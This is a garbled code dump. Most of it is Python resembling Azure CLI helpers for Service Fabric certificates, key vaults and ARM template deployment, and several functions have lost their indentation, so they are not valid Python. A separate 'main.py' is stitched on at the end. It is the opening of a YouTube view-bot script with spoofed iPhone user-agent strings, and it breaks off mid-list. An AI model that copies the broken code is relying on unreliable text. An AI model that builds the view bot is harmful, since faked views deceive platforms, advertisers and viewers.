    settings. VMSS updates run in parallel threads, all joined before
    returning.
    """
    import threading
    threads = []
    compute_client = compute_client_factory(cli_ctx)
    vmsses = list(compute_client.virtual_machine_scale_sets.list(resource_group_name))
    if vmsses is not None:
        for vmss in vmsses:
            fabric_ext = _get_sf_vm_extension(vmss)
            if fabric_ext is not None and (cluster_id is None or _get_cluster_id_in_sf_extension(fabric_ext).lower() == cluster_id.lower()):
                if is_cluster_cert:
                    # Build the secondary-certificate setting as a plain dict.
                    # The original round-tripped through json.loads on a
                    # format()ed string, which would produce invalid JSON if
                    # the thumbprint contained quote characters.
                    fabric_ext.settings["certificateSecondary"] = {
                        "thumbprint": thumbprint,
                        "x509StoreName": "my",
                    }
                t = threading.Thread(target=_add_cert_to_vmss, args=[cli_ctx, vmss, resource_group_name, vault_id, secret_url])
                t.start()
                threads.append(t)
    for t in threads:
        t.join()
# pylint: disable=inconsistent-return-statements
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
# pylint: disable=inconsistent-return-statements
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if 0 < size < 3:
return 'None'
if 3 <= size < 5:
return 'Bronze'
if 5 <= size < 7:
return 'Silver'
if 7 <= size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
    """Convert a {section: {parameter: value}} dict into settings-section descriptions.

    Sections that end up with no parameters are omitted from the result.
    """
    settings = []
    # Guard kept verbatim in spirit: an empty dict (or one whose keys are all
    # falsy) produces no sections, matching the original behavior.
    if setting_dict and any(setting_dict):
        for section_name, parameters in setting_dict.items():
            descriptions = [SettingsParameterDescription(name=param_name, value=param_value)
                            for param_name, param_value in parameters.items()]
            if descriptions:
                settings.append(SettingsSectionDescription(name=section_name, parameters=descriptions))
    return settings
def _deploy_arm_template_core(cmd,
                              resource_group_name,
                              template,
                              parameters,
                              deployment_name=None,
                              mode='incremental',
                              validate_only=False,
                              no_wait=False):
    """Validate or deploy an ARM template to a resource group.

    When validate_only is True only a validation call is made; otherwise a
    create-or-update deployment is started.  no_wait skips waiting on the
    long-running operation.
    """
    DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    properties = DeploymentProperties(
        template=template, template_link=None, parameters=parameters, mode=mode)
    client = resource_client_factory(cmd.cli_ctx)
    Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
    deployment = Deployment(properties=properties)
    if validate_only:
        # API versions >= 2019-10-01 expose validation as a long-running
        # operation (begin_validate); older ones validate synchronously.
        if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
            deploy_poll = sdk_no_wait(no_wait, client.deployments.begin_validate, resource_group_name, deployment_name,
                                      deployment)
            return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
        return sdk_no_wait(no_wait, client.deployments.validate, resource_group_name, deployment_name, deployment)
    deploy_poll = sdk_no_wait(no_wait, client.deployments.begin_create_or_update, resource_group_name, deployment_name,
                              deployment)
    return LongRunningOperation(cmd.cli_ctx)(deploy_poll)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
def _get_certificate_name(certificate_subject_name, resource_group_name):
if certificate_subject_name is None:
certificate_name = resource_group_name
else:
certificate_name = certificate_subject_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
if certificate_subject_name is None:
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
certificate_name = "{}{}".format(certificate_name, suffix)
return certificate_name
# pylint: disable=inconsistent-return-statements
def _get_vault_from_secret_identifier(cli_ctx, secret_identifier):
    """Return the key vault whose name matches the host of *secret_identifier*, or raise CLIError."""
    vault_name = urlparse(secret_identifier).hostname.split('.')[0]
    vaults = keyvault_client_factory(cli_ctx).vaults.list()
    if vaults is not None:
        for candidate in vaults:
            if candidate.name.lower() == vault_name.lower():
                return candidate
    raise CLIError("Unable to find vault with name '{}'. Please make sure the secret identifier '{}' is correct.".format(vault_name, secret_identifier))
def _get_vault_uri_and_resource_group_name(cli_ctx, vault):
    """Return (vault_uri, resource_group_name) for *vault*, re-fetched via a fresh GET."""
    # Resource id layout: /subscriptions/<sub>/resourceGroups/<rg>/... -> index 4 is the group.
    vault_resource_group_name = vault.id.split('/')[4]
    vaults_client = keyvault_client_factory(cli_ctx).vaults
    refreshed = vaults_client.get(vault_resource_group_name, vault.name)
    return refreshed.properties.vault_uri, vault_resource_group_name
def _safe_get_vault(cli_ctx, resource_group_name, vault_name):
    """Return the vault, or None when it does not exist; other cloud errors are re-raised."""
    vaults_client = keyvault_client_factory(cli_ctx).vaults
    try:
        return vaults_client.get(resource_group_name, vault_name)
    except CloudError as ex:
        if ex.error.error == 'ResourceNotFound':
            return None
        raise
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(cli_ctx, vault, secret_identifier):
    """Fetch the secret behind *secret_identifier* and return its certificate's
    SHA-1 thumbprint (hex with the colons stripped).
    """
    secret_uri = urlparse(secret_identifier)
    path = secret_uri.path
    # Secret identifier path layout: /secrets/<name>/<version>
    segment = path.split('/')
    secret_name = segment[2]
    secret_version = segment[3]
    vault_uri_group = _get_vault_uri_and_resource_group_name(cli_ctx, vault)
    vault_uri = vault_uri_group[0]
    client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
    secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
    cert_bytes = secret.value
    x509 = None
    import base64
    decoded = base64.b64decode(cert_bytes)
    # Secrets backing certificates are usually base64-encoded PKCS#12; fall
    # back to treating the raw value as PEM when that parse fails.
    try:
        x509 = crypto.load_pkcs12(decoded).get_certificate()
    except (ValueError, crypto.Error):
        pass
    if not x509:
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
    if not x509:
        raise Exception('invalid certificate')
    thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
    return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(cli_ctx, vault_base_url, certificate_name, certificate_data,
                       disabled=False, password=None, certificate_policy=None, tags=None):
    """Import a .pem or .pfx certificate file into a key vault.

    *certificate_data* is a path to the file on disk.  The content type is
    detected by attempting a PEM parse first and falling back to PKCS#12.
    Returns the key-vault import result.

    :raises CLIError: when the file is neither valid PEM nor valid PKCS#12.
    """
    CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
    CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
    SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
    import binascii
    # Close the file handle deterministically (the original leaked it).
    with open(certificate_data, 'rb') as cert_file:
        certificate_data = cert_file.read()
    x509 = None
    content_type = None
    try:
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
        # if we get here, we know it was a PEM file
        content_type = 'application/x-pem-file'
        try:
            # for PEM files (including automatic endline conversion for
            # Windows)
            certificate_data = certificate_data.decode(
                'utf-8').replace('\r\n', '\n')
        except UnicodeDecodeError:
            certificate_data = binascii.b2a_base64(
                certificate_data).decode('utf-8')
    except (ValueError, crypto.Error):
        pass
    if not x509:
        try:
            if password:
                x509 = crypto.load_pkcs12(
                    certificate_data, password).get_certificate()
            else:
                x509 = crypto.load_pkcs12(certificate_data).get_certificate()
            content_type = 'application/x-pkcs12'
            certificate_data = binascii.b2a_base64(
                certificate_data).decode('utf-8')
        except crypto.Error:
            raise CLIError(
                'We could not parse the provided certificate as .pem or .pfx. '
                'Please verify the certificate with OpenSSL.')
    # Carry the certificate's validity window over to the vault attributes.
    not_before, not_after = None, None
    if x509.get_notBefore():
        not_before = _asn1_to_iso8601(x509.get_notBefore())
    if x509.get_notAfter():
        not_after = _asn1_to_iso8601(x509.get_notAfter())
    cert_attrs = CertificateAttributes(enabled=not disabled,
                                       not_before=not_before,
                                       expires=not_after)
    if certificate_policy:
        secret_props = certificate_policy.get('secret_properties')
        if secret_props:
            secret_props['content_type'] = content_type
        else:
            # (the original 'elif certificate_policy and not secret_props'
            # was always true at this point)
            certificate_policy['secret_properties'] = SecretProperties(
                content_type=content_type)
    else:
        certificate_policy = CertificatePolicy(
            secret_properties=SecretProperties(content_type=content_type))
    logger.info("Starting 'keyvault certificate import'")
    client_not_arm = _get_keyVault_not_arm_client(cli_ctx)
    result = client_not_arm.import_certificate(cli_ctx=cli_ctx,
                                               vault_base_url=vault_base_url,
                                               certificate_name=certificate_name,
                                               base64_encoded_certificate=certificate_data,
                                               certificate_attributes=cert_attrs,
                                               certificate_policy=certificate_policy,
                                               tags=tags,
                                               password=password)
    logger.info("Finished 'keyvault certificate import'")
    return result
def _download_secret(cli_ctx, vault_base_url, secret_name, pem_path, pfx_path, secret_version=''):
    """Download a certificate secret and optionally write it as .pem and/or .pfx.

    The secret value is expected to be a base64-encoded PKCS#12 bundle.
    Partially-written output files are removed when an error occurs, and
    the error is re-raised.
    """
    client = _get_keyVault_not_arm_client(cli_ctx)
    secret = client.get_secret(vault_base_url, secret_name, secret_version)
    secret_value = secret.value
    if pem_path:
        try:
            import base64
            decoded = base64.b64decode(secret_value)
            p12 = crypto.load_pkcs12(decoded)
            # 'with' guarantees the handle is closed even when a dump call
            # raises (the original leaked the handle on error).
            with open(pem_path, 'wb') as f_pem:
                f_pem.write(crypto.dump_privatekey(
                    crypto.FILETYPE_PEM, p12.get_privatekey()))
                f_pem.write(crypto.dump_certificate(
                    crypto.FILETYPE_PEM, p12.get_certificate()))
                ca = p12.get_ca_certificates()
                if ca is not None:
                    for cert in ca:
                        f_pem.write(crypto.dump_certificate(
                            crypto.FILETYPE_PEM, cert))
        except Exception as ex:  # pylint: disable=broad-except
            if os.path.isfile(pem_path):
                os.remove(pem_path)
            raise ex
    if pfx_path:
        try:
            import base64
            decoded = base64.b64decode(secret_value)
            # Parse to validate the blob really is PKCS#12 before writing.
            p12 = crypto.load_pkcs12(decoded)
            with open(pfx_path, 'wb') as f:
                f.write(decoded)
        except Exception as ex:  # pylint: disable=broad-except
            if os.path.isfile(pfx_path):
                os.remove(pfx_path)
            raise ex
def _get_default_policy(cli_ctx, subject):
    """Build the default self-signed certificate policy, normalizing the subject to 'CN=...'."""
    normalized = subject if subject.lower().startswith('cn') else "CN={0}".format(subject)
    return _default_certificate_profile(cli_ctx, normalized)
def _default_certificate_profile(cli_ctx, subject):
    """Build the default key-vault certificate policy for *subject*:
    exportable 2048-bit RSA, PKCS#12 secret, self-issued, 12-month validity
    with auto-renew triggered 90 days before expiry.
    """
    # SDK model classes are resolved lazily through get_sdk so the module
    # works across keyvault data-plane SDK versions.
    CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
    CertificatePolicy = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_policy#CertificatePolicy')
    ActionType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#ActionType')
    KeyUsageType = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_vault_client_enums#KeyUsageType')
    IssuerParameters = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.issuer_parameters#IssuerParameters')
    KeyProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.key_properties#KeyProperties')
    LifetimeAction = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.lifetime_action#LifetimeAction')
    SecretProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.secret_properties#SecretProperties')
    X509CertificateProperties = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.x509_certificate_properties#X509CertificateProperties')
    Trigger = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.trigger#Trigger')
    Action = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.action#Action')
    template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
                                                              key_type=u'RSA',
                                                              key_size=2048,
                                                              reuse_key=True),
                                 secret_properties=SecretProperties(
                                     content_type=u'application/x-pkcs12'),
                                 x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
                                                                                                  KeyUsageType.data_encipherment,
                                                                                                  KeyUsageType.digital_signature,
                                                                                                  KeyUsageType.key_encipherment,
                                                                                                  KeyUsageType.key_agreement,
                                                                                                  KeyUsageType.key_cert_sign],
                                                                                      subject=subject,
                                                                                      validity_in_months=12),
                                 lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
                                                                  action=Action(action_type=ActionType.auto_renew))],
                                 issuer_parameters=IssuerParameters(
                                     name=u'Self',),
                                 attributes=CertificateAttributes(enabled=True))
    return template
def _create_self_signed_key_vault_certificate(cli_ctx, vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
    """Create a self-signed certificate in Key Vault and block until it is done.

    :param cli_ctx: CLI context used to resolve SDK models and credentials.
    :param vault_base_url: data-plane URL of the target vault.
    :param certificate_name: name of the certificate to create.
    :param certificate_policy: certificate policy; patched via item access
        below, so it is expected to be dict-like — TODO confirm with callers.
    :param certificate_output_folder: if given, the certificate is also
        downloaded there as <name>.pem and <name>.pfx.
    :param disabled: create the certificate in a disabled state.
    :param tags: optional tags applied to the certificate.
    :param validity: optional validity in months overriding the policy value.
    :return: tuple of (certificate bundle, pem output path or None).
    """
    CertificateAttributes = get_sdk(cli_ctx, ResourceType.DATA_KEYVAULT, 'models.certificate_attributes#CertificateAttributes')
    cert_attrs = CertificateAttributes(enabled=not disabled)
    logger.info("Starting long-running operation 'keyvault certificate create'")
    if validity is not None:
        certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
    client = _get_keyVault_not_arm_client(cli_ctx)
    client.create_certificate(
        vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
    # otherwise loop until the certificate creation is complete
    # Poll every 10 seconds until the operation leaves the 'inProgress' state.
    while True:
        check = client.get_certificate_operation(
            vault_base_url, certificate_name)
        if check.status != 'inProgress':
            logger.info("Long-running operation 'keyvault certificate create' finished with result %s.",
                        check)
            break
        try:
            time.sleep(10)
        except KeyboardInterrupt:
            logger.info("Long-running operation wait cancelled.")
            raise
        except Exception as client_exception:
            # NOTE(review): this handler is attached to time.sleep(), which is
            # unlikely to raise anything but KeyboardInterrupt; it looks like it
            # was meant to wrap the polling call above — confirm before relying
            # on it.
            message = getattr(client_exception, 'message', client_exception)
            import json
            try:
                # Best effort: append the service-side error detail, if present.
                message = str(message) + ' ' + json.loads(
                    client_exception.response.text)['error']['details'][0]['message']  # pylint: disable=no-member
            except:  # pylint: disable=bare-except
                pass
            raise CLIError('{}'.format(message))
    pem_output_folder = None
    if certificate_output_folder is not None:
        os.makedirs(certificate_output_folder, exist_ok=True)
        pem_output_folder = os.path.join(
            certificate_output_folder, certificate_name + '.pem')
        pfx_output_folder = os.path.join(
            certificate_output_folder, certificate_name + '.pfx')
        _download_secret(cli_ctx, vault_base_url, certificate_name,
                         pem_output_folder, pfx_output_folder)
    return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
def _get_keyVault_not_arm_client(cli_ctx):
    """Return a Key Vault data-plane (non-ARM) client for the active profile."""
    from azure.cli.core._profile import Profile

    api_version = str(get_api_version(cli_ctx, ResourceType.DATA_KEYVAULT))

    def _authenticate(server, resource, scope):  # pylint: disable=unused-argument
        # Only the raw token (first tuple element) is needed by the client.
        return Profile(cli_ctx=cli_ctx).get_raw_token(resource)[0]

    return KeyVaultClient(KeyVaultAuthentication(_authenticate),
                          api_version=api_version)
def _create_keyvault(cmd,
                     cli_ctx,
                     resource_group_name,
                     vault_name,
                     location=None,
                     sku=None,
                     enabled_for_deployment=True,
                     enabled_for_disk_encryption=None,
                     enabled_for_template_deployment=None,
                     no_self_perms=None, tags=None):
    """Create a Key Vault, granting the current user a default access policy.

    Unless ``no_self_perms`` is truthy, the caller's AAD object id is resolved
    via the Graph API and given a broad key/secret/certificate permission set.

    :raises CLIError: when the current user's object id cannot be determined
        and ``no_self_perms`` was not requested.
    :return: the poller/result of the vaults create_or_update call.
    """
    from azure.cli.core._profile import Profile
    from azure.graphrbac.models import GraphErrorException
    profile = Profile(cli_ctx=cli_ctx)
    # Graph credentials are needed to look up the caller's object id for the
    # vault access policy below.
    cred, _, tenant_id = profile.get_login_credentials(
        resource=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
    graph_client = GraphRbacManagementClient(cred,
                                             tenant_id,
                                             base_url=cli_ctx.cloud.endpoints.active_directory_graph_resource_id)
    subscription = profile.get_subscription()
    # Resolve management-plane model classes for the active API version.
    VaultCreateOrUpdateParameters = cmd.get_models('VaultCreateOrUpdateParameters', resource_type=ResourceType.MGMT_KEYVAULT)
    VaultProperties = cmd.get_models('VaultProperties', resource_type=ResourceType.MGMT_KEYVAULT)
    KeyVaultSku = cmd.get_models('Sku', resource_type=ResourceType.MGMT_KEYVAULT)
    AccessPolicyEntry = cmd.get_models('AccessPolicyEntry', resource_type=ResourceType.MGMT_KEYVAULT)
    Permissions = cmd.get_models('Permissions', resource_type=ResourceType.MGMT_KEYVAULT)
    CertificatePermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#CertificatePermissions')
    KeyPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#KeyPermissions')
    SecretPermissions = get_sdk(cli_ctx, ResourceType.MGMT_KEYVAULT, 'models#SecretPermissions')
    KeyVaultSkuName = cmd.get_models('SkuName', resource_type=ResourceType.MGMT_KEYVAULT)
    # Default to the 'standard' SKU when none was requested.
    if not sku:
        sku = KeyVaultSkuName.standard.value
    if no_self_perms:
        # Caller explicitly asked for a vault with no access policies.
        access_policies = []
    else:
        # Default permission set granted to the creating principal.
        permissions = Permissions(keys=[KeyPermissions.get,
                                        KeyPermissions.create,
                                        KeyPermissions.delete,
                                        KeyPermissions.list,
                                        KeyPermissions.update,
                                        KeyPermissions.import_enum,
                                        KeyPermissions.backup,
                                        KeyPermissions.restore],
                                  secrets=[SecretPermissions.get,
                                           SecretPermissions.list,
                                           SecretPermissions.set,
                                           SecretPermissions.delete,
                                           SecretPermissions.backup,
                                           SecretPermissions.restore,
                                           SecretPermissions.recover],
                                  certificates=[CertificatePermissions.get,
                                                CertificatePermissions.list,
                                                CertificatePermissions.delete,
                                                CertificatePermissions.create,
                                                CertificatePermissions.import_enum,
                                                CertificatePermissions.update,
                                                CertificatePermissions.managecontacts,
                                                CertificatePermissions.getissuers,
                                                CertificatePermissions.listissuers,
                                                CertificatePermissions.setissuers,
                                                CertificatePermissions.deleteissuers,
                                                CertificatePermissions.manageissuers,
                                                CertificatePermissions.recover])
        # Prefer the signed-in user's object id; fall back to deriving it from
        # the subscription's login metadata.
        try:
            object_id = _get_current_user_object_id(graph_client)
        except GraphErrorException:
            object_id = _get_object_id(graph_client, subscription=subscription)
        if not object_id:
            raise CLIError('Cannot create vault.\n'
                           'Unable to query active directory for information '
                           'about the current user.\n'
                           'You may try the --no-self-perms flag to create a vault'
                           ' without permissions.')
        access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
                                             object_id=object_id,
                                             permissions=permissions)]
    properties = VaultProperties(tenant_id=tenant_id,
                                 sku=KeyVaultSku(name=sku),
                                 access_policies=access_policies,
                                 vault_uri=None,
                                 enabled_for_deployment=enabled_for_deployment,
                                 enabled_for_disk_encryption=enabled_for_disk_encryption,
                                 enabled_for_template_deployment=enabled_for_template_deployment)
    parameters = VaultCreateOrUpdateParameters(location=location,
                                               tags=tags,
                                               properties=properties)
    client = keyvault_client_factory(cli_ctx).vaults
    return client.create_or_update(resource_group_name=resource_group_name,
                                   vault_name=vault_name,
                                   parameters=parameters)
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.signed_in_user.get()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
    """Derive the caller's AAD object id from subscription login metadata."""
    user = subscription['user']
    if not user:
        logger.warning('Current credentials are not from a user or service principal. '
                       'Azure Key Vault does not work with certificate credentials.')
        return None
    kind = user['type']
    if kind == 'user':
        return _get_object_id_by_upn(graph_client, user['name'])
    if kind == 'servicePrincipal':
        return _get_object_id_by_spn(graph_client, user['name'])
    logger.warning("Unknown user type '%s'", kind)
    return None
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
    """Resolve an AAD object id, preferring spn, then upn, then subscription."""
    if spn:
        return _get_object_id_by_spn(graph_client, spn)
    if upn:
        return _get_object_id_by_upn(graph_client, upn)
    return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
                                         cluster_name,
                                         admin_password,
                                         certificate_thumbprint,
                                         vault_id,
                                         certificate_id,
                                         reliability_level,
                                         admin_name,
                                         cluster_size,
                                         durability_level,
                                         vm_sku,
                                         os_type,
                                         linux):
    """Fill the bundled template's parameter file with the supplied values.

    :raises CLIError: when the parameter file has no 'parameters' section.
    :return: the populated parameters dict.
    """
    parameter_file, _ = _get_template_file_and_parameters_file(linux)
    parameters = get_file_json(parameter_file)['parameters']
    if parameters is None:
        raise CLIError('Invalid parameters file')
    # Table-driven assignment of the simple one-to-one values.
    values = {
        'clusterLocation': cluster_location,
        'clusterName': cluster_name,
        'adminUserName': admin_name,
        'adminPassword': admin_password,
        'certificateThumbprint': certificate_thumbprint,
        'sourceVaultvalue': vault_id,
        'certificateUrlvalue': certificate_id,
        'reliabilityLevel': reliability_level,
        'nt0InstanceCount': int(cluster_size),
        'durabilityLevel': durability_level,
        'vmSku': vm_sku,
        'vmImageSku': os_type,
    }
    for key, value in values.items():
        parameters[key]['value'] = value
    # Semi-annual Windows images live under a different offer.
    if "Datacenter-Core-1709" in os_type:
        parameters['vmImageOffer']['value'] = 'WindowsServerSemiAnnual'
    return parameters
def _set_parameters_for_customize_template(cmd,
                                           cli_ctx,
                                           resource_group_name,
                                           certificate_file,
                                           certificate_password,
                                           vault_name,
                                           vault_resource_group_name,
                                           certificate_output_folder,
                                           certificate_subject_name,
                                           secret_identifier,
                                           parameter_file):
    """Fill certificate values in a user-supplied parameters file.

    The file must declare the primary certificate parameters
    (sourceVaultValue / certificateThumbprint / certificateUrlValue); it may
    also declare the secondary set (sec* variants), in which case a second
    certificate is created and written to those entries.

    :raises CLIError: when the file is invalid or the expected parameter
        names are missing / only partially present.
    :return: tuple of (populated parameters dict, certificate output file).
    """
    parameters = get_file_json(parameter_file)['parameters']
    if parameters is None:
        raise CLIError('Invalid parameters file')
    if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
        logger.info('Found primary certificate parameters in parameters file')
        result = _create_certificate(cmd,
                                     cli_ctx,
                                     resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
        output_file = result[3]
    else:
        logger.info('Primary certificate parameters are not present in parameters file')
        raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
                       'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
    if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
        logger.info('Found secondary certificate parameters in parameters file')
        result = _create_certificate(cmd,
                                     cli_ctx,
                                     resource_group_name,
                                     certificate_file,
                                     certificate_password,
                                     vault_name,
                                     vault_resource_group_name,
                                     certificate_output_folder,
                                     certificate_subject_name,
                                     secret_identifier)
        # BUG FIX: this branch previously wrote to the PRIMARY parameter keys
        # (SOURCE_VAULT_VALUE / CERTIFICATE_URL_VALUE / CERTIFICATE_THUMBPRINT),
        # clobbering the primary certificate values instead of populating the
        # secondary entries.
        parameters[SEC_SOURCE_VAULT_VALUE]['value'] = result[0]
        parameters[SEC_CERTIFICATE_URL_VALUE]['value'] = result[1]
        parameters[SEC_CERTIFICATE_THUMBPRINT]['value'] = result[2]
    else:
        if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
            logger.info(
                'Secondary certificate parameters are not present in parameters file')
        else:
            raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
                           'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
    return parameters, output_file
def _modify_template(linux):
    """Load and return the bundled ARM template JSON for the given OS flavor."""
    _, template_file = _get_template_file_and_parameters_file(linux)
    return get_file_json(template_file)
|
main.py | import os
import random
import string
import threading
import time
from queue import Queue
import platform
import requests
from colorama import Fore, init
# ASCII-art banner printed at startup and re-printed by the status screen.
intro = """
███████╗████████╗██████╗ ███████╗ █████╗ ███╗ ███╗ ██████╗ ██████╗ ████████╗████████╗███████╗██████╗
██╔════╝╚══██╔══╝██╔══██╗██╔════╝██╔══██╗████╗ ████║ ██╔══██╗██╔═══██╗╚══██╔══╝╚══██╔══╝██╔════╝██╔══██╗
███████╗ ██║ ██████╔╝█████╗ ███████║██╔████╔██║█████╗██████╔╝██║ ██║ ██║ ██║ █████╗ ██████╔╝
╚════██║ ██║ ██╔══██╗██╔══╝ ██╔══██║██║╚██╔╝██║╚════╝██╔══██╗██║ ██║ ██║ ██║ ██╔══╝ ██╔══██╗
███████║ ██║ ██║ ██║███████╗██║ ██║██║ ╚═╝ ██║ ██████╔╝╚██████╔╝ ██║ ██║ ███████╗██║ ██║
╚══════╝ ╚═╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
https://github.com/SquirkHades/youtube-view-bot/
"""
print(intro)
# Pick the terminal-clear command for the current platform.
if platform.system() == "Windows": #checking OS
    clear = "cls"
else:
    clear = "clear"
# Pool of mobile Safari user-agent strings; one is picked at random per request.
iPhone_UA = ("Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/16D57",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148",
             "Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)",
